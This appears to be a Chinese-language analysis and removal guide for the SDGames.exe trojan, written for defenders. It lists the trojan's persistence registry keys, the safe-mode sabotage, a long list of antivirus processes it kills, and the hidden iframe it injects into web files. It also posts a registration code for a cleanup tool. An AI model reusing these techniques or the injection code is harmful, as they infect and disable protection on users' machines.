在每個磁碟分區釋放SDGames.exe和AUTORUN.INF 達到通過隨身碟傳播的目的
並且在每個分區釋放Windows.url,新建資料夾·url,Recycleds.url指向該分區根目錄下的SDGames.exe
基本介紹
- 中文名:SDGames.exe
- 檔案大小:59282 byte
- 加殼方式:北斗4.1
- 編寫語言:Microsoft Visual Basic
惡性病毒 SDGames.exe(小瓢蟲)
檔案名稱稱:SDGames.exe
檔案大小:59282 byte
A V命名:
Trojan.Win32.VB.yth(瑞星)
Trojan-Downloader.Win32.VB.lg(卡巴斯基)
Win32.Troj.Downloader.vb.237568(金山)
加殼方式:北斗4.1
編寫語言:Microsoft Visual Basic 5.0 / 6.0
檔案MD5:fc334ffcf5aff3ca8235705d61f62990
主要表現為:
2.感染htm等網頁檔案
3.感染或覆蓋exe等執行檔
4.破壞安全模式
6.修改系統時間並鎖定時間
7.可通過隨身碟等移動存儲傳播
8.關閉Windows防火牆等服務並打開許多危險服務,並使得用戶磁碟被共享
9.後台添加賬戶並設定管理員許可權
10.修改某些檔案關聯
下面為具體分析
File: SDGames.exe
Size: 59282 bytes
File Version: 3.02
Modified: 2007年12月6日, 17:56:32
MD5: FC334FFCF5AFF3CA8235705D61F62990
SHA1: 4DFFE9E9BB666A13CC646EBA4371BDF4AFFB49BC
CRC32: 1DD096C2
1.病毒運行後,釋放如下檔案或副本
%systemroot%\system32\SDGames.exe
%systemroot%\system32\Taskeep.vbs
%systemroot%\system32\Avpser.cmd
%systemroot%\system32\netshare.cmd
%systemroot%\system32\AUTORUN.INF
在每個磁碟分區釋放SDGames.exe和AUTORUN.INF 達到通過隨身碟傳播的目的
並且在每個分區釋放Windows.url,新建資料夾.url,Recycleds.url指向該分區根目錄下的SDGames.exe
誘使用戶點擊
2.修改reg和txt檔案關聯指向%systemroot%\system32\SDGames.exe
3.刪除HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
破壞安全模式
4.創建自啟動項目
[HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows]
<load><%systemroot%\system32\SDGames.exe> [SDGame]
<run><%systemroot%\system32\SDGames.exe> [SDGame]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
<Winstary><%systemroot%\system32\SDGames.exe> [SDGame]
5.破壞系統的一些功能
禁用cmd:HKCU\Software\Policies\Microsoft\Windows\System\DisableCMD
破壞顯示隱藏檔案:HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue
使得檔案擴展名無法顯示:HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel
禁用註冊表編輯器
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistrytools
禁用任務管理器
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr
修改IE主頁為:http://www.*.10mb.cn
修改IE默認頁為:wangma
隱藏資料夾選項
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions
6.關閉如下服務並將其啟動類型設為禁用
Alg
sharedaccess
wuauserv
7.開啟下列服務並將其啟動類型設為自動
Terminal Services
winmgmt
lanmanserver
8.%systemroot%\system32\netshare.cmd將用戶的所有磁碟設為共享
9.添加一個名為guest的賬戶,並將其設定為管理員許可權
10.攻擊反病毒軟體,利用Avpser.cmd強制結束一些防毒軟體進程
RavMonD.exe
RavStub.exe
Anti*
AgentSvr*
CCenter*
Rsaupd*
SmartUp*
FileDsty*
RegClean*
360tray*
360safe*
kabaload*
safelive*
KASTask*
kpFW32*
kpFW32X*
KvXP_1*
KVMonXP_1*
KvReport*
KvXP*
KVMonXP*
nter*
TrojDie*
avp.com
KRepair.COM
Trojan*
KvNative*
Virus*
Filewall*
Kaspersky*
JiangMin*
RavMonD*
RavStub*
RavTask*
adam*
cSet*
PFWliveUpdate*
mmqczj*
Trojanwall*
Ras.exe
runiep.exe
avp.exe
PFW.exe
rising*
ikaka*
.duba*
kingsoft*
木馬*
社區*
aswBoot*
MainCon*
Regs*
AVP*
Task*
regedit*
Ras*
srgui*
norton*
avp*
fire*
spy*
bullguard*
PersFw*
KAV*
ZONEALARM*
SAFEWEB*
OUTPOST*
ESAFE*
clear*
BLACKICE*
360safe.exe
Shadowservice.exe
v3webnt.exe
v3sd32.exe
v3monsvc.exe
hkcmd.exe
DNTUS26.EXE
AhnSD.exe
CTFMON.EXE
MonsysNT.exe
WINAW32.EXE
PNTIOMON.exe
avgw.exe
PROmon.exe
PNTIOMON.exe
MagicSet.exe
MainCon.exe
TrCleaner.exe
修復*
保護*
360rpt.exe
360Safe.exe
360tray.EXE
adam.exe
AgentSvr.exe
AppSvc32.exe
autoruns.exe
avgrssvc.exe
AvMonitor.exe
avp.com
avp.exe
CCenter.exe
ccSvcHst.exe
FileDsty.exe
FTCleanerShell.exe
HijackThis.exe
IceSword.exe
iparmo.exe
Iparmor.exe
isPwdSvc.exe
kabaload.exe
KaScrScn.SCR
KASMain.exe
KASTask.exe
KAV32.exe
KAVDX.exe
KAVPFW.exe
KAVSetup.exe
KAVStart.exe
KISLnchr.exe
KMailMon.exe
KMFilter.exe
Knod32kui.exe
KPFW32.exe
KPFW32X.exe
KPFWSvc.exe
KRegEx.exe
KRepair.COM
KsLoader.exe
KVCenter.kxp
KvDetect.exe
KvfwMcl.exe
KVMonXP.kxp
KVMonXP_1.kxp
kvol.exe
kvolself.exe
KvReport.kxp
KVScan.kxp
KVSrvXP.exe
KVStub.kxp
kvupload.exe
kvwsc.exe
KvXP.kxp
KvXP_1.kxp
KWatch9x.exe
KWatchX.exe
loaddll.exe
MagicSet.exe
MainCon.exe
mcconsol.exe
mmqczj.exe
mmsk.exe
msconfig.exe
NAVSetup.exe
nod32krn.exe
PFW.exe
PFWLiveUpdate.exe
QHSET.exe
QQ.exe
Ras.exe
Rav.exe
RavMon.exe
RavMonD.exe
RavStub.exe
RavTask.exe
RegClean.exe
rfwcfg.exe
RfwMain.exe
rfwProxy.exe
rfwsrv.exe
Rsaupd.exe
runiep.exe
safelive.exe
scan32.exe
Shadowservice.exe
shcfg32.exe
SmartUp.exe
SREng.exe
symlcsvc.exe
SysSafe.exe
TrojanDetector.exe
Trojanwall.exe
TrojDie.kxp
UIHost.exe
UmxAgent.exe
UmxAttachment.exe
UmxCfg.exe
UmxFwHlp.exe
UmxPol.exe
UpLive.EXE.exe
WoptiClean.exe
zxsweep.exe
12.遍歷感染非系統分區的exe檔案(覆蓋方式)
13.遍歷感染非系統分區的jsp asp php htm html hta檔案
在其末尾加入<iframe id="iframe" width="0" height="0" scrolling="no" frameborder="0" src="http://*.10mb.cn/" name="Myframe"
align="center" border="0">的代碼
14.修改系統時間的年份為2030年,並禁止用戶修改時間
15.隱藏系統資料夾
解決辦法:
下載sreng:http://download.kztechs.com/files/sreng2.zip
Icesword:http://mail.ustc.edu.cn/~jfpan/download/IceSword122cn.zip
1.解壓縮Icesword
把Icesword改名為1.exe運行
進程中 找到SDGames.exe 右擊它 結束進程
然後點擊 Icesword左下角的 檔案 按鈕
找到如下檔案並刪除
%systemroot%\system32\SDGames.exe
%systemroot%\system32\Taskeep.vbs
%systemroot%\system32\Avpser.cmd
%systemroot%\system32\netshare.cmd
%systemroot%\system32\AUTORUN.INF
以及各個分區下面的
SDGames.exe,AUTORUN.INF,Windows.url,新建資料夾.url,Recycleds.url
2.運行sreng
(由於時間已經被改為2030年 所以sreng會彈出過期提示,不用擔心,輸入下面的授權碼即可使用)
用戶名:teyqiu
授權號:26129027541185431409013556
打開sreng後 點擊 系統修復-檔案關聯-修復
系統修復-Windows Shell/IE -全選-修復
高級修復-修復安全模式
3.還是sreng中
啟動項目 註冊表 刪除如下項目
[HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows]
<load><%systemroot%\system32\SDGames.exe> [SDGame]
<run><%systemroot%\system32\SDGames.exe> [SDGame]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
<Winstary><%systemroot%\system32\SDGames.exe> [SDGame]
並刪除所有紅色的IFEO項目
啟動項目 System.ini
刪除Windows節點
4.取消磁碟共享
開始 運行 輸入cmd 輸入如下命令
net share c /delete
net share d /delete
...
以此類推 分別取消所有磁碟分區的共享
5.顯示系統資料夾
開始 運行 輸入cmd 輸入如下命令
attrib -h %systemroot%\system32
6.修復受感染的htm等網頁檔案
推薦使用CSI的iframkill
下載地址:http://www.vaid.cn/blog/read.php?9
